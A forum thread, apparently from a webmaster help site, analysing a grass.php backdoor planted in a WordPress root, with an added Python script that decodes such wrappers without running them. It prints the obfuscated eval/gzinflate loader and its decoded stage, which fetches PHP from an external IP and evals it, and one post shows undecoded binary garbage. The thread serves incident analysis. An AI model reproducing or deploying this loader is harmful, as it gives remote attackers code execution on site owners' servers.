A hacker managed to get a page added to the root of one of my WordPress sites (not sure how yet). He added a page called grass.php; when you put a parameter in the URL, grass.php?p=9-6559, it seems to call up a page from another site and display it on my site under that URL. This is the code. It appears to be compressed. Can anyone uncompress this code so I can see what he is doing and the site he is getting his info from?

<?php {eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));} ?>
// Decoded stage: fetches a second payload from the attacker's server and eval()s it (shown for analysis, do not run)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
$data = curl_exec($ch);
curl_close($ch);
eval(base64_decode($data));
exit;

Not sure what this returns, but the eval could allow it to execute just about any PHP command.
If you want to be able to figure these out, just follow all the steps except the eval function.

<?php
// Decode only; the eval() step is deliberately left out so nothing runs
$string = gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ=='));
?>
<!-- htmlspecialchars() stops a "</textarea>" inside the decoded payload from breaking out of the box -->
<textarea><?php echo htmlspecialchars($string); ?></textarea>
Very simple. Replace the evaluation with print and the job's done. Here is the code:

// Decoded stage (attacker's code, shown for analysis, do not run)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
$data = curl_exec($ch);
curl_close($ch);
eval(base64_decode($data));
exit;

I hope it helps you solve the issue. Besides, show me your site and user input pages; I may look into it. Your script might have some security holes.
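The two replies above describe the same procedure: peel the eval(gzinflate(base64_decode('...'))) wrapper by doing every step except the eval. The script below is an added example, not code from the thread, that does this statically in Python so the payload is never executed by a PHP interpreter at all. It builds its own two-layer sample from a constructed stand-in for the curl stage (the hostname example.invalid and the STAGE2 text are assumptions, not the thread's real second stage), peels the layers, and lists the remote-loading constructs an analyst looks for in the final layer. It also tries the actual blob from the first post; if your copy of the blob was mangled in transit the decode step reports that instead of failing.

```python
import base64
import re
import zlib

# The wrapper used by the thread's grass.php: eval(gzinflate(base64_decode('...')))
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)\s*\)",
    re.DOTALL,
)


def peel_layer(php_source):
    """Decode one wrapper layer. Returns (inner_code, True) or (php_source, False) if no wrapper was found.
    Decoding only: the inner code is returned as text, never executed."""
    m = WRAPPER.search(php_source)
    if not m:
        return php_source, False
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    # PHP's gzinflate() consumes a raw DEFLATE stream with no zlib/gzip header, hence wbits=-15
    inner = zlib.decompress(blob, -15).decode("utf-8", errors="replace")
    return inner, True


def deobfuscate(php_source, max_layers=20):
    """Peel nested wrappers; returns the list of decoded layers, innermost last (empty if none found)."""
    layers = []
    current = php_source
    for _ in range(max_layers):
        current, found = peel_layer(current)
        if not found:
            break
        layers.append(current)
    return layers


def remote_loaders(php_code):
    """Dangerous constructs worth flagging in the final layer (order is fixed so results are comparable)."""
    markers = ("curl_init", "eval(base64_decode", "file_get_contents", "system(", "passthru(", "shell_exec(")
    return [name for name in markers if name in php_code]


def gzinflate_wrap(php_code):
    """Build the same wrapper an attacker would, from plaintext; used only to construct a test sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, matching gzinflate()
    raw = comp.compress(php_code.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()


# Constructed stand-in for the curl stage (assumed hostname; not the thread's real payload)
STAGE2 = ('$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://example.invalid/?p=".trim($_GET[\'p\']));'
          ' $data=curl_exec($ch); eval(base64_decode($data)); exit;')
# Two layers deep, to show that the loop keeps peeling until plain code appears
SAMPLE = "<?php " + gzinflate_wrap(gzinflate_wrap(STAGE2)) + " ?>"

# The blob exactly as posted in the first message of the thread
PAGE_BLOB = ("<?php {eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));} ?>")

if __name__ == "__main__":
    layers = deobfuscate(SAMPLE)
    for i, layer in enumerate(layers, 1):
        print("--- constructed sample, layer %d ---" % i)
        print(layer)
    print("indicators:", remote_loaders(layers[-1]))
    try:
        print("--- blob from the thread ---")
        print(deobfuscate(PAGE_BLOB)[-1])
    except (zlib.error, ValueError, IndexError) as exc:
        print("could not decode the posted blob (copy may be corrupted):", exc)
```

Run it with no arguments. The useful habit it encodes is the one both replies recommend: never let the sample reach an interpreter that can call eval(); decode with a tool that has no way to execute what it finds, then grep the last layer for network fetches and a second eval().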
Yes, that helps, thanks. I'm just using WordPress on www.thedigitaldomain.com. This is a Windows server, not a Linux server. I'm wondering if a loophole was caused by PHP on a Windows server. This is the only site I have ever done that on; I've never had any problem with this version of WordPress on Linux servers.
It's hard to say how that got there. I would check for things like anonymous FTP, or directories/scripts with full permissions that aren't escaping user input. It takes a fairly big hole to put a script like this on a site. Very unlikely it was XSS. Was this pulled from a database, or did you find it hard-coded? Also, many times plugin creators put these in their plugins to track or put a link to their site on a blog. Was this in a specific plugin?
The scary part was this was an actual page on the root of this domain, not just something in the database or in the plugin folder.
grass.php seems to be the culprit then. Where does this file reside? Within the root of the WordPress blog? I never touched WordPress, but as per the hacker's code s/he has injected code some way through the query string. A second good guess may be an upload feature enabled in your blog, where the script might be recognizing image uploads using getimagesize and fake files have been uploaded with a GIF89a signature and the rest PHP code. Once a user is able to upload such a thing and can get to the uploaded path, s/he gets hold of everything. See if some patch for WordPress was released around those dates, and/or whether you might not have updated WordPress for a long time. All of this is just a good guess. Regards
I had something like that happen to one of my sites once. I read into it and found out that some Chinese hacking gang was the culprit. Weird, huh? I think it was a hole in my version of WordPress.
Decodes to: }�]��@���"r4�վO�D��Ic]��Xlp�V�-�ߟ-��j����[(D�~+�TR���'o@W�vmQxh�ҿ��� � ���Oq?���F����]ɱ��C뛼�6�vrj����O�L���Uf�z$�䴑G�=1d��C�0%,���(��~�v{��pb�<�Y�a� �M~���hkxd�{���x�o���R/�
Seems like the best guess is a hole in my WordPress script. I'll move up to the latest version later today. Thanks for everyone's input.